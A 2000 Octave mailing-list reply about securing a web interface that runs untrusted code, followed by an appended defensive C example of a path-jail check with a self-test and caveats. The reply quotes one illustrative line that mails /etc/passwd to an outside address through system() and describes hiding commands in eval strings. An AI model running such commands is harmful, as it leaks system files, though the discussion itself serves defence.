help-octave

Re: Octave Web GUI


From: John W. Eaton
Subject: Re: Octave Web GUI
Date: Mon, 26 Jun 2000 11:17:06 -0500 (CDT)

On 26-Jun-2000, Jonathan King <address@hidden> wrote:

| Sounds interesting, but the point about security is, I think, extremely
| important.  I'm sure that somebody will correct me if I'm wrong, but
| Octave wasn't really developed for this purpose, so there are probably
| many potential "gotchas" beyond the obvious ones.

Right.

Running untrusted code in a chroot jail is a good idea.  If it is set up
correctly, it should prevent someone from doing something like

  system ("Mail address@hidden /etc/passwd");

to get a copy of your real password file.

Trying to filter out commands in the source code is probably not the
right approach because it won't prevent things like

  somestring = "a command you really don't want to execute";
  ...
  eval (somestring);

(Imagine all the ways you can hide the contents of `somestring' using
numeric codes, setstr, or whatever.)

The `simple' solution of not allowing eval() will also prevent lots of
valid Octave code from working.

For some ideas about another way to implement a secure version of
Octave without having to modify the Octave sources, you might also
look at NetMath, http://rene.ma.utexas.edu/users/wfs/netmath/demo/demo.html.
It solves the security problem by preloading a library that replaces
system calls like open, unlink, rmdir, etc. with safe versions.
Unfortunately, the trick that it uses may not work on all (or even
very many) Unix systems, including more recent Linux distributions.

jwe

-----------------------------------------------------------------------
Octave is freely available under the terms of the GNU GPL.

Octave's home on the web:  http://www.che.wisc.edu/octave/octave.html
How to fund new projects:  http://www.che.wisc.edu/octave/funding.html
Subscription information:  http://www.che.wisc.edu/octave/archive.html
-----------------------------------------------------------------------
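
The preloaded-library approach the reply points to (NetMath replacing open,
unlink, rmdir and friends with "safe versions") stands or falls on the path
policy those replacements enforce.  The block below is an added example
written for this page; it is not NetMath's code, not part of Octave, and the
names jail_path_allowed, jailed_open and jail_selftest are invented for the
illustration.  It shows the policy half of such a shim in C: canonicalise
the requested path with realpath(3) so that "..", symlinks and doubled
slashes are resolved, fall back to the parent directory for files that are
about to be created, fail closed on any error, and guard the prefix boundary
so "/jail2" is not mistaken for something inside "/jail".  The hook itself
(defining open() in a shared object and fetching the real one with
dlsym(RTLD_NEXT, "open")) is described in a comment but not implemented, so
the program compiles and runs as an ordinary executable; the self-test
builds its own throwaway jail under /tmp.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Resolve "..", doubled slashes and symlinks with realpath(3) before the policy
 * looks at the path.  A file about to be created does not exist yet, so on
 * ENOENT canonicalise the parent directory instead and re-attach the leaf.
 * Returns 0 on success, -1 on any failure (which callers treat as "deny"). */
static int canonicalize(const char *path, char out[PATH_MAX])
{
    if (realpath(path, out) != NULL) return 0;
    if (errno != ENOENT) return -1;

    const char *slash = strrchr(path, '/');
    if (slash == NULL) return -1;                 /* only absolute paths get here */
    const char *leaf = slash + 1;
    if (*leaf == '\0' || strcmp(leaf, ".") == 0 || strcmp(leaf, "..") == 0)
        return -1;                                /* a missing dir is never . or .. */

    size_t plen = (size_t)(slash - path);
    if (plen == 0) plen = 1;                      /* leaf sits directly under "/" */
    char parent[PATH_MAX], cparent[PATH_MAX];
    if (plen >= sizeof parent) return -1;
    memcpy(parent, path, plen);
    parent[plen] = '\0';
    if (realpath(parent, cparent) == NULL) return -1;   /* parent must exist */
    int n = snprintf(out, PATH_MAX, "%s/%s",
                     strcmp(cparent, "/") == 0 ? "" : cparent, leaf);
    return (n < 0 || n >= PATH_MAX) ? -1 : 0;
}

/* Return 1 if `path` resolves to `jail_root` or something beneath it, else 0.
 * Relative paths and every error are denied: the check fails closed. */
int jail_path_allowed(const char *jail_root, const char *path)
{
    char root[PATH_MAX], target[PATH_MAX];
    if (jail_root == NULL || path == NULL || path[0] != '/') return 0;
    if (realpath(jail_root, root) == NULL || canonicalize(path, target) != 0)
        return 0;
    if (strcmp(root, "/") == 0) return 1;         /* jail is the whole filesystem */
    size_t rlen = strlen(root);
    if (strncmp(target, root, rlen) != 0) return 0;
    /* "/jail" must not match "/jail2": the next char must end the path or be '/' */
    return target[rlen] == '\0' || target[rlen] == '/';
}

/* The shim's replacement open(): deny outside the jail, else call the real one.
 * In an LD_PRELOAD library the real open() would come from dlsym(RTLD_NEXT, "open"). */
int jailed_open(const char *jail_root, const char *path, int flags, mode_t mode)
{
    if (!jail_path_allowed(jail_root, path)) { errno = EACCES; return -1; }
    return open(path, flags, mode);
}

/* Constructed self-test: builds a throwaway jail under /tmp, plants a symlink
 * pointing outside it and a sibling dir sharing the jail's name as a prefix,
 * then exercises the policy.  Returns 0 if every check holds, else its number. */
int jail_selftest(void)
{
    char tmpl[] = "/tmp/jailXXXXXX";
    char *jail = mkdtemp(tmpl);
    if (jail == NULL) return 100;
    char inside[PATH_MAX], escape[PATH_MAX], link[PATH_MAX], via_link[PATH_MAX];
    char deep[PATH_MAX], sibdir[PATH_MAX], sibling[PATH_MAX];
    snprintf(inside,   sizeof inside,   "%s/data.txt", jail);
    snprintf(escape,   sizeof escape,   "%s/../../etc/passwd", jail);
    snprintf(link,     sizeof link,     "%s/etc", jail);
    snprintf(via_link, sizeof via_link, "%s/passwd", link);
    snprintf(deep,     sizeof deep,     "%s/missing_dir/file", jail);
    snprintf(sibdir,   sizeof sibdir,   "%s2", jail);
    snprintf(sibling,  sizeof sibling,  "%s/x", sibdir);

    int fail = 0;
    int fd = jailed_open(jail, inside, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) fail = 1; else close(fd);                      /* 1: create inside */
    if (!fail && jail_path_allowed(jail, escape))     fail = 2; /* ".." escape     */
    if (!fail && symlink("/etc", link) != 0)          fail = 3;
    if (!fail && jail_path_allowed(jail, via_link))   fail = 4; /* symlink escape  */
    if (!fail && jail_path_allowed(jail, deep))       fail = 5; /* missing parent  */
    if (!fail && mkdir(sibdir, 0700) != 0)            fail = 6;
    if (!fail && jail_path_allowed(jail, sibling))    fail = 7; /* prefix confusion */
    if (!fail && jail_path_allowed(jail, "data.txt")) fail = 8; /* relative path   */

    unlink(inside); unlink(link); rmdir(sibdir); rmdir(jail);
    return fail;
}

int main(void)
{
    int rc = jail_selftest();
    printf("jail self-test: %s (code %d)\n", rc == 0 ? "passed" : "FAILED", rc);
    return rc != 0;
}
```

Two caveats a practitioner would add to the reply's own warning that the
preload trick is fragile.  First, LD_PRELOAD interposition only reaches
dynamically linked programs that go through the libc wrappers: a statically
linked helper, a direct syscall, or a setuid binary (for which the dynamic
loader ignores LD_PRELOAD) bypasses it entirely, which is why it is a
defence in depth inside a chroot rather than a substitute for one.  Second,
check-then-open as written leaves a window between the realpath() check and
the real open() in which a symlink could be swapped; the stricter form opens
the jail root once and resolves everything relative to that descriptor with
openat(), or on recent Linux openat2() with RESOLVE_BENEATH, so the kernel
enforces the boundary rather than a string comparison.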
